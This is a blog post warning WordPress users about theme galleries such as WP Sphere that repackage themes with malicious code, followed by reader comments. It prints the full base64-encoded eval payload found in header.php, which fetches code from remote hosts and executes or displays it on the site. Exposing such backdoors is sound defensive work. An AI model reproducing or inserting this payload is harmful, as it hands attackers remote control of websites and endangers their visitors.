Do not download WordPress themes distributed by 3rd party sites

Warning for new and existing WordPress users: DO NOT download WordPress themes from 3rd party "galleries". Identify the original source of the theme and download directly from the authors website.

As WordPress – both hosted and self-hosted – continues to enjoy explosive growth, exposure to malicious activity and code will increase. Sadly, this applies to both website administrators and visitors. In August I was disappointed to discover that WordPress and Joomla themes were being redistributed with malicious code; code which would track your own visitors or allow for random ads to be served. Since being exposed, the offending website has been taken down. Unfortunately, similar theme galleries have appeared with the same intent to redistribute themes with malicious code.

WP Sphere is distributed WordPress themes with malicious code

Alistair recently tipped me off to another WordPress gallery distributing themes which include malicious code / modifications. The tip from Alistair actually began as a support email:

I have one question about the encoded stuff I saw in the header, […]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
MzMDkxNik7'));

After kindly informing Alistair that my theme(s) were not distributed with any code outside of the WordPress scope, I discovered that the code in question was downloaded from WP Sphere. Poking through some of the other recognized themes on the site, I discovered that each of the themes made available for download had been repackaged to include the code above – often in plain view within the header.php file. Paul Carroll took the time to break down what the code above exposes users to.

I think the potential for abuse of this script is huge. I see it as a covert channel to setup Word Press enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.

If you have downloaded themes from WP Sphere or any other WordPress themes gallery, exercise caution and inspect the source code. If you are not code proficient, identify the original author and download the theme directly.

How do you police a non-policed platform?

The growth of a platform increases the virtual bulls-eye for malicious individuals to target. How do you protect WordPress users from download sites like WP Sphere or Template Browser? Alistair pointed out that WP Sphere was targeting users by purchasing Google AdWords to strengthen and increase the likelihood of attracting organic search engine traffic. How do you fight against such websites?

Only download 5ThirtyOne themes from 5thirtyone.com

I invite WordPress theme authors to make the same recommendation for their visitors – do not download themes from websites other than your own. Additionally, if you are a theme author and discover work being redistributed [without permission] with or without malicious code, contact the offending website host to request that content be taken down.

Unless a 5ThirtyOne theme was officially converted for use on a blogging platform other than WordPress, please download themes from nowhere else other than the links below:

If you’ve recommended WordPress to friends and family, please take the time to check or inform them of the dangers of downloading from free theme galleries. [Digg this]

Discuss - 68 Comments

  1. […] Do not download WordPress themes distributed by 3rd party sites (tags: wordpress) […]

  2. […] at 5thirtyone.com discovered exactly that when he got a support request for one of his own WordPress themes. The user […]

  3. […] Do not download WordPress themes distributed by 3rd party sites Audit Those 3rd Party Themes and Plugins Before Enabling Them  Brak komentarzy, Skomentuj lub wyÅ›lij “Ping” […]

  4. […] website 5thirtyone, disebutkan paling tidak ada dua theme gallery yg melakukan kecurangan ini, yaitu WPSphere.com dan […]

  5. Sean says:

    An official repo for themes would be helpful. But we already have semi-official repos, and people still download from places like WP Sphere.

    For an official repo to be really effective, Matt & Co. would have to build a theme viewer right into WordPress itself. That would keep most WP newbies from straying past the official stuff.

    That being said, I put together a light weight "anti-spyware" plugin for WordPress. It scans a theme when you activate it for suspicious code. It then alerts the user, and asks them if they really want to activate the theme.

    More @ http://headzoo.com/wp-anti-wares

  6. Grasiani says:

    I’ve downloaded themes from http://rock-kitty.net/ which have that same type of code.

    I even e-mailed the site owner asking for “clean” copies of the files, but I never got a reply…

    I’ve done some research on that type of code, and it’s seems a “legitim” way of encrypting information, but why use it on a wordpress theme?

  7. Anto says:

    I know, theres no point of using it on a wordpress theme, but it also effects the design as well.

    So in by removing that, the design, fooks up. There for people who don’t know how to get around it, to have a link back to the proper theme owner and they;re text, they just leave it in there and dont touch it. Meaning the asshole that used this code to distribute these themes and call it they’re own are lame, and can advertise their sites more.

  8. […] 著名的网站设计师Derek在自己的Blog上提醒Wordpress的新手在从一些主题下载站下载WP模板时一定要小心,因为他发现自己制作的模板被一个名为WP Sphere(这个网站现已不能访问)的站点重新打过包,并在header.php文件中嵌入了恶意代码,因此从该站点下载了模板的用户很可能会中招,Derek建议大家直接从模板作者的网站上下载东西而不是经由WP Sphere这样的第三方主题站,国内也有不少第三方站点提供WP模板的下载,目前似乎还未发现这样的恶意事件,不过小心使得万年船,在应用模板前最好检查一下文件代码,看看是否有类似的恶意代码,如果你的Wordpress水平已经到了一定水平,不妨试试自己写模板吧。 […]

  9. […] Check for malicious code in your WordPress themes and plugins. […]

  10. […] Code in 3rd Party WordPress Themes I recently ran across the article Do not download WordPress themes distributed by 3rd party sites on the 5thiryone blog. Apparently there are a number of 3rdparty free wordpress theme sites that […]

  11. Atomictumor says:

    […] Read the rest of the article here. […]

  12. […] How to recognize a WordPress theme with malicious code. […]

  13. […] those of you who are used to downloading WordPress themes from 3rd party sites, think again before you keep doing it. You might want to read this post to […]

  14. […] I made the theme from scratch so it’s not coming from there, unlike other themes that were downloaded on the Internet as what 5thirtyone’s Derek Punsalan wrote on his blog. […]

  15. LiveCrunch says:

    My hawaiian blog http://www.hawaiib.com was flaged by google because of one of the themes I used! well i removed the theme and hope they will remove the flag

    if you go to google and type in hawaiib you will see something like "this site might harm your computer"

    WTF! 🙂

    hate those people that play around with the code, luckily I noticed where the problem is but it was too late!

  16. […] I download it from some website that I don’t even know what it was, but sure when I read 5thirtyone blog site looks similar but yet URL is […]

  17. […] a fellow WordPress blogger Mike sent me an article that was written by 5thirtyone which reminds users that you have to be careful where you download your WordPress themes from. I […]

  18. saki says:

    Thanks to this post I was able to identify some bad coding in my theme. Thanks so much for informing us about this.

  19. It’s nasty code – without getting into specifics, it will try to execute a file loaded from another server – which allows the other person to do ANYTHING on your site. And if that doesn’t work, it will try to display a file from the other site (which of course could be Javascript cross scripting code or you-know-what-kind of ads).

  20. […] 5thirtyone.com talks about care in downloading themes, explaining how one was hacked. Digging into the malicious code chunk myself, I found that the code goes out and loads a file from one of three sites (logging the visit as well, by the way). Once loaded, the code can be either displayed on the blog, or actually executed. […]